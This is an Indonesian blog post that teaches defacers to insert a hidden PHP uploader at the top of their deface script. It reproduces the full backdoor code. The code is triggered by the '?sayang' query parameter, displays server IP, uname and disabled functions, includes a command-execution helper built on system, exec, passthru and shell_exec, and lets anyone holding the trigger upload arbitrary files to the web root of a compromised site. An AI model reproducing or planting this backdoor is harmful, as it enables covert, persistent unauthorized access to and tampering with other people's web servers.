Cara Menyisipkan Uploader Tersembunyi di Script Deface

Iklan 728x90

Cara Menyisipkan Uploader Tersembunyi di Script Deface




Hidden Uploader atau uploader tersembunyi dapat kita manfaatkan untuk mengunggah file ke web yang telah ditanami hidden uploader tersebut.

Kalo kita menggunakan Uploader atau Shell backdor publik atau siapapun bisa mengaksesnya tentu akan kena tykung dong?:v maka dari itu coba dulu yang ini yaitu menambahkan hidden uploader di script deface kesayangan kita untuk menghindari hal tersebut.


Masukan Source code berikut ini di atas script deface kesayangan kamu:

<?php
################################
## ./Alphra87 Hidden Uploader ##
################################
if(isset($_GET['sayang'])){
?>
<html>
<head>
<title>FAM_GTG</title>
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
background-color: black;
color: #f7f7f7;
font-size: 13px;
}
body {
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
a{
color:green;
text-decoration: none;
}
textarea{
backgroud-color:#333333;
color: #f7f7f7;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
select{
border: 1px white solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input[type=submit] {
background: #5b86e5;
color: #f7f7f7;
height: 24px;
border: 2px solid #f7f7f7;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
</style>
</head>
<center>
<?php
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=green>".$perm."</font>";
}
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function sulap($text) {
if(!get_magic_quotes_gpc()) {
return $text;
}
return stripslashes($text);
}
function ambilKata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}
error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
echo "<b><font color='green'><br>Server IP : ".gethostbyname($_SERVER['HTTP_HOST'])."</b></font>";
echo "<b><font color='green'><br>".php_uname()."</b></font><br>";
echo "<b><font color='green'>Disable Functions: $show_ds</b></font><br><br>";
echo "&nbsp;<a href='?' style='background:#5b86e5;color:#f7f7f7;border:2px solid #f7f7f7;width:80px;padding:0px 8px 0px 8px;border-radius:5px;'>H O M E</a>&nbsp;";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='file'>
<input type='submit' value='upload' name='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Berhasil Upload --> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload di document root.";
}
} else {
if(@copy($_FILES['file']['tmp_name'], $files)) {
echo "sukses upload <b>$files</b> di folder ini";
} else {
echo "gagal upload";
}
}
}
}
?>
Masukan script deface kamu disini


Kemudian simpan file tersebut dengan ekstensi .PHP
Untuk cara memanggil uploadernya yaitu: /namafile.php?sayang



Baca Juga
SHARE
Subscribe to get free updates

Related Posts

Post a Comment